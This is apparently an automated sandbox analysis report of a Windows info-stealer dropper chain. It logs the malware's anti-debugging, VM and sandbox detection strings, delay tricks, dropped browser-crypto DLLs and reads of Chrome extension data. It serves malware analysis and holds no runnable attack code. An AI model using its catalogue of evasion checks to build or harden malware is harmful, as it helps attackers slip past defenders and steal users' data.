Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Special instruction interceptor: First address: 81CD02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Special instruction interceptor: First address: 81A69A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Special instruction interceptor: First address: 81CD25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Special instruction interceptor: First address: A4D957 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Special instruction interceptor: First address: C5EA61 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Special instruction interceptor: First address: E2E5B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Special instruction interceptor: First address: E94D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Special instruction interceptor: First address: 10DFC0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Special instruction interceptor: First address: 13146C7 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Memory allocated: 4F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Memory allocated: 50E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Memory allocated: 70E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

Code function: 3_2_05330BBC rdtsc

3_2_05330BBC

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window / User API: threadDelayed 5737
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Window / User API: threadDelayed 3694
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5041
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2728
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4805
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4144

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062359001\51c549c9c2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\random.exe TID: 7436	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe TID: 7692	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180	Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180	Thread sleep time: -374187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3272	Thread sleep count: 238 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3272	Thread sleep time: -476238s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep count: 246 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -7380000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176	Thread sleep count: 187 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176	Thread sleep time: -374187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep count: 213 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184	Thread sleep time: -426213s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe TID: 7244	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe TID: 7340	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe TID: 7376	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe TID: 7568	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 7436	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 7460	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 7440	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 4048	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 7860	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 7432	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe TID: 6288	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1344	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe TID: 6896	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe TID: 3744	Thread sleep count: 166 > 30
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe TID: 3744	Thread sleep count: 190 > 30
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe TID: 1620	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C47EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

2_2_6C47EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: AGDDD2MYZL6KQO94XW.exe, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178297747.0000000001326000.00000040.00000001.01000000.00000006.sdmp, HYCURX00F7L1ZQ3FYN.exe, HYCURX00F7L1ZQ3FYN.exe, 00000003.00000002.1953547643.0000000000EBA000.00000040.00000001.01000000.00000007.sdmp, HYCURX00F7L1ZQ3FYN.exe, 00000003.00000000.1897884955.0000000000EBA000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1982529215.000000000097A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000000.1923551433.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000002.1985810721.000000000097A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000000.1929238611.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000B.00000000.2186428418.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, 5f198671b1.exe, 0000000C.00000002.2455506770.00000000012EF000.00000040.00000001.01000000.00000010.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2547566419.0000000000C09000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HYCURX00F7L1ZQ3FYN.exe, 00000003.00000003.1923632749.0000000001534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ql
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"xV
Source: 5f198671b1.exe, 0000000C.00000003.2339898052.0000000006C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'=
Source: random.exe, 00000000.00000003.1716303395.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2177777866.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2524450063.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2419343125.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2496681237.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2478516959.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2492162711.0000000000709000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: mshta.exe, 0000001B.00000002.2690970379.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`z:
Source: 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 1cfdc82c16.exe, 0000000D.00000002.2538649323.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 48b7eec64e.exe, 00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarev
Source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178297747.0000000001326000.00000040.00000001.01000000.00000006.sdmp, HYCURX00F7L1ZQ3FYN.exe, 00000003.00000002.1953547643.0000000000EBA000.00000040.00000001.01000000.00000007.sdmp, HYCURX00F7L1ZQ3FYN.exe, 00000003.00000000.1897884955.0000000000EBA000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1982529215.000000000097A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000000.1923551433.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000002.1985810721.000000000097A000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000000.1929238611.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000B.00000000.2186428418.000000000097A000.00000080.00000001.01000000.0000000B.sdmp, 5f198671b1.exe, 0000000C.00000002.2455506770.00000000012EF000.00000040.00000001.01000000.00000010.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2547566419.0000000000C09000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5f198671b1.exe, 0000000C.00000003.2418350885.0000000001AEF000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2418619089.0000000001AF1000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2419062659.0000000001B0C000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000002.2460713808.0000000001B0D000.00000004.00000020.00020000.00000000.sdmp, 5f198671b1.exe, 0000000C.00000003.2418676440.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld+OD
Source: 5f198671b1.exe, 0000000C.00000003.2337266694.0000000001AA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: random.exe, 00000000.00000003.1716303395.0000000000E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWD

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Process queried: DebugPort
